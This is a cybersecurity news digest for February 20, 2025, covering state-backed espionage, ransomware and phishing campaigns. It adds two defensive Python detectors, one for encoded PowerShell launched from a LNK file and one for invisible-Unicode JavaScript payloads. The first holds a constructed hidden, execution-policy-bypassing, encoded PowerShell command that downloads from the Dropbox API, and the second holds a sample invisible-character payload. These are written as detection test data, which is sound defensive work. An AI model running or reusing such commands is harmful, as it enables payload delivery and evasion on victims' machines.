CyberNews 2-20-25
Cybersecurity News for Feb 20, 2025
Story 1: Russian Groups Target Signal Messenger in Espionage Campaign
Russian-affiliated threat groups, including UNC5792 and UNC4221, are actively targeting users of the Signal messaging app, particularly those involved in sensitive military and governmental communications related to Ukraine. These attackers employ phishing techniques, such as sending malicious QR codes that, when scanned, link the victim’s Signal account to a device controlled by the attackers, enabling real-time message interception. Google’s Threat Intelligence Group has observed this activity and anticipates that such tactics may become more widespread, potentially affecting users beyond the current conflict zone.
Story 2: Russian CryptoBytes Hackers Exploiting Windows Machines
The Russian cybercriminal group known as CryptoBytes has intensified its ransomware campaigns by deploying a modified version of the UxCryptor malware. Targeting Windows systems globally, these attacks utilize advanced anti-analysis techniques to evade detection and employ psychological pressure tactics to coerce victims into paying cryptocurrency ransoms. Researchers have observed that the group leverages leaked ransomware builders, lowering the barrier for entry and suggesting a potential franchise-style operation.
Story 3: Phishing Remains the Preferred Technique Among Threat Actors
A recent report from Darktrace highlights that phishing continues to be the most favored method among cybercriminals, with over 30.4 million phishing emails detected between December 2023 and December 2024. Notably, 70% of these emails bypassed DMARC authentication, and 55% evaded existing security measures before detection. The report also notes a rise in sophisticated tactics, including AI-generated content and the exploitation of trusted third-party services to enhance the credibility of phishing attempts.
Story 4: North Korean Hackers Using Dropbox and PowerShell Scripts
The North Korean state-sponsored group Kimsuky (APT43) has been conducting cyber espionage campaigns targeting South Korean entities and cryptocurrency users. These attacks involve phishing emails containing malicious LNK files that execute obfuscated PowerShell scripts, utilizing Dropbox’s API for payload delivery and data exfiltration. This strategy allows the attackers to bypass traditional security defenses by leveraging trusted cloud services and living-off-the-land techniques.
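The chain described above (a LNK file launching obfuscated PowerShell that talks to the Dropbox API) leaves a recognisable footprint in process-creation telemetry. The following detector is an added example written for this digest, not code from any of the reports it summarises; the events are constructed Sysmon-style records, the field names, thresholds and the `REDACTED` token are assumptions, and the helper that builds an `-EncodedCommand` value exists only to construct the sample.

```python
import base64
import re

# Dropbox API hosts; contact from a hidden, encoded PowerShell process is the
# combination the story describes.
DROPBOX_API_HOSTS = ("api.dropboxapi.com", "content.dropboxapi.com")


def _encode_ps(cmd):
    """Build a PowerShell -EncodedCommand value (base64 of UTF-16LE).
    Used here only to construct sample data."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (Sysmon Event ID 1 style, simplified).
SAMPLE_EVENTS = [
    {   # PowerShell spawned by explorer.exe (what a double-clicked LNK looks like),
        # hidden window, encoded command reaching the Dropbox content API.
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc " + _encode_ps(
            "Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/download "
            "-Headers @{Authorization='Bearer REDACTED'}"),
    },
    {   # Benign interactive administration from a console.
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell.exe Get-Service -Name Spooler",
    },
    {   # Unrelated process, also launched from explorer.exe.
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe notes.txt",
    },
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -e/-ec/-enc/-EncodedCommand argument, or ""."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""


def analyze_event(ev):
    """Score one process-creation event; three or more indicators is suspicious."""
    image = ev["Image"].lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return {"suspicious": False, "indicators": [], "decoded": ""}
    cmd = ev["CommandLine"]
    decoded = decode_encoded_command(cmd)
    full = (cmd + " " + decoded).lower()     # inspect both the raw and decoded text
    indicators = []
    if ev["ParentImage"].lower().endswith("explorer.exe"):
        indicators.append("spawned_by_explorer")   # consistent with a clicked LNK
    if decoded:
        indicators.append("encoded_command")
    if re.search(r"-w(?:indowstyle)?\s+hidden", full):
        indicators.append("hidden_window")
    if re.search(r"-e(?:xecutionpolicy|p)\s+bypass", full):
        indicators.append("execution_policy_bypass")
    if any(host in full for host in DROPBOX_API_HOSTS):
        indicators.append("dropbox_api_contact")
    return {"suspicious": len(indicators) >= 3, "indicators": indicators, "decoded": decoded}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze_event(ev))
```

Decoding the encoded argument before matching is the step that matters: a rule that only reads the raw command line never sees the Dropbox URL. The indicator count is a starting point; in production the parent-process and hidden-window checks should be weighted against the environment's baseline of legitimate scripts.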
Story 5: Microsoft Recognized as Leader in Cyber-Physical Systems Protection
Microsoft has been named a Leader in the 2025 Gartner Magic Quadrant for Cyber-Physical Systems Protection Platforms. This recognition underscores Microsoft’s commitment to providing comprehensive security solutions that bridge the gap between IT and operational technology environments. Their approach emphasizes the integration of advanced threat protection, unified security management, and robust compliance features to safeguard critical infrastructure and cyber-physical systems.
Story 6: Fake Browser Updates Deploy NetSupport RAT and StealC Malware
A sophisticated malware campaign attributed to the threat actor SmartApeSG has been distributing NetSupport RAT and StealC malware through fake browser update notifications. Unsuspecting users are lured into downloading malicious payloads from compromised websites, leading to remote access tool deployment and credential theft. The attackers employ advanced evasion techniques, including DLL side-loading, to maintain persistence and avoid detection.
Story 7: Phishing Attack Hides JavaScript Using Invisible Unicode Trick
Cybercriminals have developed a new obfuscation method that uses invisible Unicode characters to conceal malicious JavaScript code within phishing emails. The technique encodes the payload's binary values as non-visible Unicode characters, so the malicious content is present in the email's source code yet renders as nothing to a reader. Such obfuscation poses significant challenges for traditional security filters and underscores the need for detection that inspects the raw character stream rather than the rendered text.
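Because the hidden payload must occupy long stretches of characters that render as nothing, the defender's lever is the raw character stream: a scan for runs of invisible code points separates this from the odd zero-width joiner that legitimately appears in emoji sequences. The scanner below is an added example written for this digest, not the technique's original analysis; the list of extra invisible code points, the run and ratio thresholds, and both sample scripts are constructed assumptions.

```python
import unicodedata

# Code points that render as nothing but are not in Unicode's "format" (Cf)
# category. Constructed for this example: the Hangul filler characters
# (category Lo) alongside Cf characters such as the zero-width space/joiner
# and the byte-order mark, which unicodedata already classifies as Cf.
EXTRA_INVISIBLE = {0x115F, 0x1160, 0x3164, 0xFFA0}


def is_invisible(ch):
    return unicodedata.category(ch) == "Cf" or ord(ch) in EXTRA_INVISIBLE


def find_invisible_runs(text, min_run=8):
    """Return runs of at least min_run consecutive invisible code points.
    Short runs (one joiner inside an emoji, a stray BOM) are normal; long runs
    carry no rendered text and are the signature of hidden payload data."""
    runs = []
    start = None
    # NUL is category Cc, never invisible here, so it safely terminates a trailing run.
    for i, ch in enumerate(text + "\x00"):
        if is_invisible(ch):
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_run:
                run = text[start:i]
                runs.append({
                    "offset": start,
                    "length": i - start,
                    "codepoints": sorted({"U+%04X" % ord(c) for c in run}),
                })
            start = None
    return runs


def verdict(text, min_run=8, max_ratio=0.05):
    """Flag text that contains a long invisible run or an unusual share of
    invisible characters; both thresholds are assumed starting points."""
    runs = find_invisible_runs(text, min_run)
    total = sum(1 for c in text if is_invisible(c))
    ratio = total / len(text) if text else 0.0
    return {
        "flagged": bool(runs) or ratio > max_ratio,
        "invisible_count": total,
        "ratio": round(ratio, 3),
        "runs": runs,
    }


# Constructed samples (not real phishing content): a benign script whose only
# invisible character is the zero-width joiner inside an emoji sequence, and a
# script carrying 32 invisible filler characters where hidden data would sit.
BENIGN_JS = "const who = '\U0001F468\u200D\U0001F4BB';\nconsole.log('hello', who);\n"
SUSPICIOUS_JS = "var a = '';\n" + ("\uFFA0\u3164" * 16) + "\neval(a);\n"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_JS), ("suspicious", SUSPICIOUS_JS)):
        print(label, verdict(sample))
```

Reporting the offset and the distinct code points of each run gives an analyst something to pivot on (which characters were used, and where in the source), and the ratio check catches payloads spread thinly between visible characters that a run-length rule alone would miss.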
Story 8: Ghost Ransomware Breaches Organizations in 70 Countries
The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have issued a joint advisory regarding the Ghost ransomware, which has compromised organizations across more than 70 countries. The attackers exploit outdated software and firmware in internet-facing services, affecting various sectors, including healthcare, government, education, and manufacturing. The advisory emphasizes the importance of maintaining up-to-date systems and implementing robust security measures to mitigate such threats.
Story 9: Critical Microsoft Bing Vulnerability Allows Remote Code Execution
Microsoft has addressed a critical security flaw in its Bing search engine, identified as CVE-2025-21355, which could have permitted unauthorized remote code execution. The vulnerability stemmed from inadequate authentication mechanisms in a critical Bing service component, potentially allowing attackers to compromise backend systems and manipulate search results. Microsoft has fully mitigated the issue on its servers, and users are advised to remain vigilant and ensure their systems are updated.